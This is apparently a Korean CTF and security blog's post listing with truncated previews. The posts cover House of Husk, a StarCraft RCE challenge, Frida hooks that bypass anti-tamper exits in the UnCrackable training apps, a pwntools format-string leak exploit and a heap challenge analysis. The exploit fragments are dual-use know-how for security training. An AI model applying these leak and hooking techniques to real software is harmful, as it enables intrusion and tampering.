만두만두

House of Huskhttps://ptr-yudai.hatenablog.com/entry/2020/04/02/111507Summaryprintf 동작 중 사용자가 custom printf 를 등록하여 사용할 수 있는 기능을 이용한 방법.다음과 같이 정의되지 않은 형식문자를 사용자가 등록하여 사용할 수 있음.#include #include ​ int func(FILE* stream, const struct printf_info* info, const void* const* args){ printf("Called Func\n"); } ​ int arginfo(const struct printf_info* info, size_t n, int* argtypes, int* size){ return 1; } ​..

StarCraft ExploitChallenge : https://ctftime.org/task/11096Summary : EUD (Extended Unit Death) Trigger, OOB, RCEpatch 파일로 생성된 취약점을 통한 스타크래프트 RCE AttackPrerequisiteinstall_gateway.bat custom battle net 주소를 추가하는 스크립트 INSTRUCTIONS.mdStarcraft.1.16.1.patch 취약점을 만드는 패치 파일https://files.theabyss.ru/sc/starcraft.zip Starcraft 1.16.1 (brood war)Settinginstall StarCraftApply patchch4rli3@TOPDESK:/mnt/d/bA..

OSS Fuzzer Errorbuild.sh 스크립트 이용해서 빌드하려고 하는데 다음과 같은 오류가 발생함./usr/lib/gcc/x86_64-linux-gnu/5.4.0/../../../../include/c++/5.4.0/fstream:534: undefined reference to `VTT for s td::basic_ifstream' /usr/lib/gcc/x86_64-linux-gnu/5.4.0/../../../../include/c++/5.4.0/fstream:534: undefined reference to `std::basi c_ifstream::~basic_ifstream()' /src/libfuzzer/libFuzzer.a(FuzzerIO.o): In function `~basic_i..

메모리 배열 조정하기 enum을 사용하거나 다음과 같이 pragma를 이용하면 댐. #pragma pack(push, 1) char c; int a; char d[0x13]; #pragma pack(pop) CTF 문제 만들 때 유용함

uncrackable 2jsfunction dumpAddr(info, addr, size) { if (addr.isNull()) return; console.log('Data dump ' + info + ' :'); var buf = Memory.readByteArray(addr, size); console.log(hexdump(buf, { offset: 0, length: size, header: true, ansi: false })); } ​ Java.perform(function(){ console.log("Hooking Start"); var System = Java.use("java.lang.System"); System.exit.implementation = function(){ console..

uncrackable 1jsJava.perform(function(){ console.log("[+] Hooking Start"); var S = Java.use("java.lang.System"); S.exit.implementation = function(){ console.log("System.exit Called"); } ​ var MainActivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity"); var a = Java.use("sg.vantagepoint.a.a"); a.a.implementation = function(args1, args2){ var retval = this.a(args1, args2); console.log(retv..

vscode diff tool폴더째로 내부에 존재하는 파일들을 비교해야 해서 적당한 extension을 찾아봤다. 사용법은 command palatte에서 diff folder를 실행시킨 뒤, 다음과 같이 각각 비교할 폴더를 지정해주면 된다.다음과 같이 동일한 파일에 대한 비교 결과가 나오며, 해당 비교 결과를 더블클릭하면 다음과 같이 새 탭으로 두 코드를 비교한 결과가 나온다. [주의] 비교할 때 디렉토리 내부의 파일의 경로가 동일해야만 제대로 비교가 가능하다.

#!/usr/bin/pythona = " FXWce2101J MLfest?'rsH TSbeweO himfw jiqtk gils! h;e(l8p,fCucl3 noyrs pn o!tt!#:*)UUUU"'''*(_BYTE *)(i + normal) = num->str[(unsigned __int8)(v5 ^ i) % (int)(unsigned __int16)num->length] ^ v5 ^ i ^ *(_BYTE *)(i + flag_byte)normal[0] = num->str[checksum % num->length] ^ checksum ^ flag_byte table = [222L, 217L, 161L, 249L, 237L, 192L, 168L, 255L, 225L, 214L, 172L, 145L, 16..

Full protectionName : ChanHee ParkSummary : fsb leak, bofExploit#!/usr/bin/python from pwn import * ​ r = process('./chall', env={'LD_PRELOAD':'libc-2.27.so'}) lib = ELF('./libc-2.27.so') #context.log_level = 'debug' #gdb.attach(r) ​ r.sendline('%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p') _leak = r.recvline().split('.') print(_leak) _stack = int(_leak[0], 16) _libc = int(_le..

Baby noteName : Chanhee ParkSummary : Integer type confusion, Uninitialized stack memory, OOB$ checksec chall [*] '/home/ch4rli3kop/Desktop/asis2020/babynote/chall' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabledCode Analysismainint __cdecl main(int argc, const char **argv, const char **envp) { __int16 v4; // [rsp+Eh] [rbp-2h] ​ v4 = readuint("n: "); n..